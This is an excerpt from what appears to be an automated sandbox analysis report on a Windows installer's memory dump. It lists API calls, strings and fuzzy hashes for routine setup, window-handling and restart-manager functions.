Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleInfoModuleProcSystem$CurrentNativeProcess
String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
API String ID: 1075732646-2623177817
Opcode ID: 437f6efd26db7f002606e4807ae5c6fc3668e6c1099b086cb69c7d4aeab98ef1
Instruction ID: ee7a5c530447a8d9bd8c988ff555263143bc42f8a6f8139229fc5ffc4aa60b1a
Opcode Fuzzy Hash: 437f6efd26db7f002606e4807ae5c6fc3668e6c1099b086cb69c7d4aeab98ef1
Instruction Fuzzy Hash: 8C11D360D043C1A4DA10A7775C4AB6B26898B3378AF16893B7940712C3EB7DCC45E2AE

Uniqueness

Uniqueness Score: -1.00%

Function 004D1F40, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 78fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000,00000000,00000000,?,004D22DB,00000000,00000000,00000000), ref: 004D1F64

Part of subcall function 0047EBB4: GetPrivateProfileStringW.KERNEL32 ref: 0047EC2A

DeleteFileW.KERNEL32(00000000,00000000,0050BCD4,00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000,00000000,00000000,?,004D22DB), ref: 004D1FBF
DeleteFileW.KERNEL32(00000000,00000000,00000000,0050BCD4,00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000,00000000,00000000), ref: 004D1FE2
SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00000000,0050BCD4,00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000,00000000), ref: 004D1FFB
RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0050BCD4,00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000), ref: 004D2001

Strings

{0AFACED1-E828-11D1-9187-B532F1E9575D}, xrefs: 004D1FA5
desktop.ini, xrefs: 004D1F80
.ShellClassInfo, xrefs: 004D1F9B
target.lnk, xrefs: 004D1FC7
CLSID2, xrefs: 004D1F96

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesDelete$DirectoryPrivateProfileRemoveString
String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
API String ID: 4261268210-1710247218
Opcode ID: 27953f98af5e6c30b36e5b882fe22643f9ee8541c3457444da0fafa8b57190ea
Instruction ID: d965e888039e7ad08507f17dfdadd6c841732fcddba23c0127908b48427fcf2b
Opcode Fuzzy Hash: 27953f98af5e6c30b36e5b882fe22643f9ee8541c3457444da0fafa8b57190ea
Instruction Fuzzy Hash: D521A171A001047BDB06E76A8D529AFB2ADDB55708B11857FF501E37C2DB7C9E02C26D

Uniqueness

Uniqueness Score: -1.00%

Function 0045772C, Relevance: 16.6, APIs: 11, Instructions: 91COMMON

Download Yara Rule

APIs

IsWindowUnicode.USER32(?), ref: 00457746
SetWindowLongW.USER32 ref: 00457761
GetWindowLongW.USER32(?,000000F0), ref: 0045776C
GetWindowLongW.USER32(?,000000F4), ref: 0045777E
SetWindowLongW.USER32 ref: 00457791
SetWindowLongW.USER32 ref: 004577AA
GetWindowLongW.USER32(?,000000F0), ref: 004577B5
GetWindowLongW.USER32(?,000000F4), ref: 004577C7
SetWindowLongW.USER32 ref: 004577DA
SetPropW.USER32(?,00000000,00000000), ref: 004577F1
SetPropW.USER32(?,00000000,00000000), ref: 00457808

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$Prop$Unicode
String ID:
API String ID: 1693715928-0
Opcode ID: 4e8e89fc14b60baab23b8e6bb04f0cab4a7c7f82b789d9dcf25034671e4204b2
Instruction ID: 125025efc1e0c9eb7fd862ca22611ef6d5d70f106df6353254ea4012160e3e6e
Opcode Fuzzy Hash: 4e8e89fc14b60baab23b8e6bb04f0cab4a7c7f82b789d9dcf25034671e4204b2
Instruction Fuzzy Hash: 1931F276604248BBDF10DF9DDC84D9A37ACAB08364F108626BD24DB6E2D338ED54DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004AA464, Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,004AA580,?,?,00000000,00000000,?,004E2F01), ref: 004AA48D

Part of subcall function 004AA434: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004AA44C

LoadLibraryW.KERNEL32(00000000,00000000,004AA580,?,?,00000000,00000000,?,004E2F01), ref: 004AA4CA

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000), ref: 00409666

Strings

RmShutdown, xrefs: 004AA51C
RmRestart, xrefs: 004AA531
RmRegisterResources, xrefs: 004AA4F2
RmEndSession, xrefs: 004AA546
RmStartSession, xrefs: 004AA4DD
RmGetList, xrefs: 004AA507
Rstrtmgr.dll, xrefs: 004AA4B7

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystemVersion
String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
API String ID: 2754715182-3419246398
Opcode ID: 552b84ea8e20de6501f5e9fbd841ae430bb56c8dfefd1ae8afc8df1d1edbb43e
Instruction ID: 20e81082da0d80a83eebd0b282948123d4da6e59cfc27c4d15237d518a3e0bff
Opcode Fuzzy Hash: 552b84ea8e20de6501f5e9fbd841ae430bb56c8dfefd1ae8afc8df1d1edbb43e
Instruction Fuzzy Hash: AC217470D10204AFEF10EF61EC86B6D37A9E729708F954A3AB40097293D73C5A18EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00474420, Relevance: 15.1, APIs: 10, Instructions: 133windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 00474491
GetWindowLongW.USER32(00000000,000000EC), ref: 004744A3
GetClassLongW.USER32(00000000,000000E6), ref: 004744B6
SetWindowLongW.USER32 ref: 004744F6
SetWindowLongW.USER32 ref: 0047450A
SetClassLongW.USER32(00000000,000000E6,?), ref: 0047451E
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00474558
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00474570
GetSystemMenu.USER32(00000000,000000FF,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000,?,00000000,000000EC,00000000,000000F0), ref: 0047457F
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 004745A8

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Long$Window$ClassMessageSend$MenuSystem
String ID:
API String ID: 494549727-0
Opcode ID: b94f601911a71ebd9c48c509d0c013546266035da1a98b9f86accd19b5c6b84f
Instruction ID: 6bde442644add904aef0f3c480088742fb8a5dcf9d70a4a041b36557313e0d6e
Opcode Fuzzy Hash: b94f601911a71ebd9c48c509d0c013546266035da1a98b9f86accd19b5c6b84f
Instruction Fuzzy Hash: 0C41087070828076DA01FB7D4C46BBE76891FC1308F08861AB594AB2D3CB7D9D61E34E

Uniqueness

Uniqueness Score: -1.00%

Function 004E4124, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 183windowCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 004E42F3
FreeLibrary.KERNEL32(?), ref: 004E4307
SendNotifyMessageW.USER32(000C025E,00000496,00002710,00000000), ref: 004E437F

Strings

GetCustomSetupExitCode, xrefs: 004E4184
DeinitializeSetup, xrefs: 004E41E2
Restarting Windows., xrefs: 004E435A
Not restarting Windows because Setup is being run from the debugger., xrefs: 004E4329
Deinitializing Setup., xrefs: 004E4145

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary$MessageNotifySend
String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
API String ID: 3817813901-1884538726
Opcode ID: bd8892466d3ea20c8cc0aefaf71e1107331209c9c52b43446cbd9257d0317700
Instruction ID: 032f33a568c648026095aa1541d731a391f6fada93b647085501dfcfdade4181
Opcode Fuzzy Hash: bd8892466d3ea20c8cc0aefaf71e1107331209c9c52b43446cbd9257d0317700
Instruction Fuzzy Hash: CC61AF34604240DFD301DFAAD899B5E7BE4FB9A315F11856AFA00C73A1DB38AC48DB19

Uniqueness

Uniqueness Score: -1.00%

Function 0047A828, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 150comwindowCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0047A859
LoadIconW.USER32(00400000,MAINICON), ref: 0047A944
GetModuleFileNameW.KERNEL32(00400000,?,00000100,?,?,?,00469730,00000000,00000000,?,00000000,?,00000000,004697AB), ref: 0047A988
CharNextW.USER32(?,00400000,?,00000100,?,?,?,00469730,00000000,00000000,?,00000000,?,00000000,004697AB), ref: 0047A9CD
CharLowerW.USER32(00000000,?,00400000,?,00000100,?,?,?,00469730,00000000,00000000,?,00000000,?,00000000,004697AB), ref: 0047A9D3

Part of subcall function 0047ABF0: GetClassInfoW.USER32 ref: 0047AC52
Part of subcall function 0047ABF0: RegisterClassW.USER32 ref: 0047AC6A
Part of subcall function 0047ABF0: SetWindowLongW.USER32 ref: 0047AD0A
Part of subcall function 0047ABF0: SendMessageW.USER32(8840C01B,00000080,00000001,00000000), ref: 0047AD2F

Strings

MAINICON, xrefs: 0047A937
@`P, xrefs: 0047A84D, 0047AA06
8`P, xrefs: 0047A93C, 0047A980

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CharClass$FileIconInfoInitializeLoadLongLowerMessageModuleNameNextRegisterSendWindow
String ID: 8`P$@`P$MAINICON
API String ID: 896494604-2479441349
Opcode ID: 1e5fd95e3d02b66ebac675ce727d18af330e138452b531cbecc1c41017ffe821
Instruction ID: 4598063fd3f050a30bd4bb6a08bc362ac08fa802665ce3c87ab879b9158c036f
Opcode Fuzzy Hash: 1e5fd95e3d02b66ebac675ce727d18af330e138452b531cbecc1c41017ffe821
Instruction Fuzzy Hash: D56160706002408FDB50EF79C885B8A3BE4AF55308F4484BAED48DF397D7B99848CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0045F97C, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 134registryCOMMON

Download Yara Rule

APIs

GetClassInfoW.USER32 ref: 0045FA4C
UnregisterClassW.USER32 ref: 0045FA77
RegisterClassW.USER32 ref: 0045FA96
GetWindowLongW.USER32(00000000,000000F0), ref: 0045FAD2
GetWindowLongW.USER32(00000000,000000F4), ref: 0045FAE7
SetWindowLongW.USER32 ref: 0045FAFA

Strings

@, xrefs: 0045F9B8
0bE, xrefs: 0045F9D0

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassLongWindow$InfoRegisterUnregister
String ID: 0bE$@
API String ID: 717780171-122265358
Opcode ID: 34155345395cdabae79473d6593b954a77a3c48b323b7f834c80ba39694d4cfb
Instruction ID: bb4addde47a978899e9994ef4f08d1b2e8de62353fa3dc6971f42be30fd904fc
Opcode Fuzzy Hash: 34155345395cdabae79473d6593b954a77a3c48b323b7f834c80ba39694d4cfb
Instruction Fuzzy Hash: 4A51A5706003549BDB20EF69CC41B9A73A9AF05305F1045BAF949D7292DB78AD88CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00479D8C, Relevance: 13.6, APIs: 9, Instructions: 106COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 00479DE6
CreateFontIndirectW.GDI32(0000005C), ref: 00479DF3
GetStockObject.GDI32(0000000D), ref: 00479E06

Part of subcall function 004310D8: MulDiv.KERNEL32(00000000,?,00000048), ref: 004310E5

SystemParametersInfoW.USER32 ref: 00479E2D
CreateFontIndirectW.GDI32(?), ref: 00479E3D
CreateFontIndirectW.GDI32(?), ref: 00479E53
CreateFontIndirectW.GDI32(?), ref: 00479E6C
GetStockObject.GDI32(0000000D), ref: 00479E8F
GetStockObject.GDI32(0000000D), ref: 00479EA3

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFontIndirect$ObjectStock$InfoParametersSystem
String ID:
API String ID: 2565622021-0
Opcode ID: 3855c4ae409a996207003510e8f705c24cfddba21bbaf5e177040d12a032337f
Instruction ID: f5799cbe55373404752a6dcd0957b159e49acc015314b586878f5ffac0ee02c6
Opcode Fuzzy Hash: 3855c4ae409a996207003510e8f705c24cfddba21bbaf5e177040d12a032337f
Instruction Fuzzy Hash: 854186306046449BEB50EB7ACD91B9A33E4AF48304F54807BB94CDB3A7DA789C05CF69

Uniqueness

Uniqueness Score: -1.00%

Function 004C44E8, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0045A758: KiUserCallbackDispatcher.NTDLL(?,00000000,?,?,004C4A09,0000000C), ref: 0045A76B

Part of subcall function 0045A78C: KiUserCallbackDispatcher.NTDLL(00000020,?,?,?,004C4539,00000000,004C46DE,?,00000000,?,?,?,004C4B68,?,0000000C), ref: 0045A79F

SHGetFileInfoW.SHELL32(c:\directory,00000010,?,000002B4,00001010), ref: 004C458B
ExtractIconW.SHELL32(00400000,00000000,?), ref: 004C45B2

Part of subcall function 004C4424: DrawIconEx.USER32 ref: 004C44BF
Part of subcall function 004C4424: DestroyIcon.USER32(?,004C44E2,?,00000020,00000020,00000000,00000000,00000003,?,00000020,?,?), ref: 004C44D5

ExtractIconW.SHELL32(00400000,00000000,00000027), ref: 004C460B
SHGetFileInfoW.SHELL32(00000000,00000000,?,000002B4,00001000), ref: 004C466C
ExtractIconW.SHELL32(00400000,00000000,?), ref: 004C4693

Strings

c:\directory, xrefs: 004C4586
shell32.dll, xrefs: 004C45EF

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Icon$Extract$CallbackDispatcherFileInfoUser$DestroyDraw
String ID: c:\directory$shell32.dll
API String ID: 1700614977-1375355148
Opcode ID: f0d83c5d1efc28f01d1a8f98fef8e879719c3522288f11ce8ba15c6e9d46fd7b
Instruction ID: 1da30287260a14f896440c9f0ae22c16ea11510bd26958a61633ce3c97e55299
Opcode Fuzzy Hash: f0d83c5d1efc28f01d1a8f98fef8e879719c3522288f11ce8ba15c6e9d46fd7b
Instruction Fuzzy Hash: 4E518078600204AFCB50EB55C99AF9AB7E8EB49304F2081AAF80497386C73CDE448F59

Uniqueness

Uniqueness Score: -1.00%

Function 0047C268, Relevance: 12.1, APIs: 8, Instructions: 118windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 0047C284
PeekMessageW.USER32 ref: 0047C29C
IsWindowUnicode.USER32 ref: 0047C2B0
PeekMessageW.USER32 ref: 0047C2D7
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0047C2ED
TranslateMessage.USER32 ref: 0047C378
DispatchMessageW.USER32 ref: 0047C385
DispatchMessageA.USER32 ref: 0047C38D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
String ID:
API String ID: 2190272339-0
Opcode ID: aec265175d4dcb7c97616442d8e5c82354d272469c79db9d15f44d72e31fbebf
Instruction ID: f564e25ef9def22ee9d688585a514d3139351bcb3ac6a6811250e2314314223d
Opcode Fuzzy Hash: aec265175d4dcb7c97616442d8e5c82354d272469c79db9d15f44d72e31fbebf
Instruction Fuzzy Hash: 5E31B22074874075EA316A294CC6BEF57844F5270CF24C56FFDC9A72C3C7AD9846425E

Uniqueness

Uniqueness Score: -1.00%

Function 00474A7C, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 174windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 00474BA0
SetMenu.USER32(00000000,00000000), ref: 00474BBD
SetMenu.USER32(00000000,00000000), ref: 00474BF2
SetMenu.USER32(00000000,00000000,00000000,00474C90), ref: 00474C0E

Part of subcall function 00408D5C: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00408DA1

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00474C55

Strings

dB, xrefs: 00474AEC

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$LoadStringWindow
String ID: dB
API String ID: 1738039741-590823066
Opcode ID: a0aa07798e338e453f53891f609012d7f48b889524cafb65d768c95d63bc2483
Instruction ID: 242794a663fa9c04f36dd6bfc9733e18e3a1e7e904f1d9d6ef06693e97fba7fe
Opcode Fuzzy Hash: a0aa07798e338e453f53891f609012d7f48b889524cafb65d768c95d63bc2483
Instruction Fuzzy Hash: 59518E70B013445BDB21EF7A88857EA3698AB85308F05847BBC499B397CB7CDC48CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004AFA3C, Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 157COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,004AFC6C,004AFC6C,?,004AFC6C,00000000), ref: 004AFBF1
CloseHandle.KERNEL32(004FCF6D,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,004AFC6C,004AFC6C,?,004AFC6C), ref: 004AFBFE

Part of subcall function 004AF9A8: WaitForInputIdle.USER32 ref: 004AF9D4
Part of subcall function 004AF9A8: MsgWaitForMultipleObjects.USER32 ref: 004AF9F6
Part of subcall function 004AF9A8: GetExitCodeProcess.KERNEL32 ref: 004AFA07
Part of subcall function 004AF9A8: CloseHandle.KERNEL32(00000001,004AFA34,004AFA2D,?,?,?,00000001,?,?,004AFDD6,?,0000003C,00000000,004AFDEC), ref: 004AFA27

Strings

COMMAND.COM" /C , xrefs: 004AFB5C
.bat, xrefs: 004AFAD8
D, xrefs: 004AFB90
.cmd, xrefs: 004AFAF3
cmd.exe" /C ", xrefs: 004AFB25

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
